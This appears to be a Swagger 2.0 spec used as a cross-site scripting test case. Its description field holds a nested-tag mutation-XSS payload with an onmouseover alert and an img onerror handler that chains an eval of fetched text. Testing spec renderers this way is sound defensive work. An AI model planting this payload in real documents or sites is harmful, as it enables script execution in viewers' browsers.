swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a href='https://google.com/test'onmouseover=alert(1337) ><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=alert(1).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
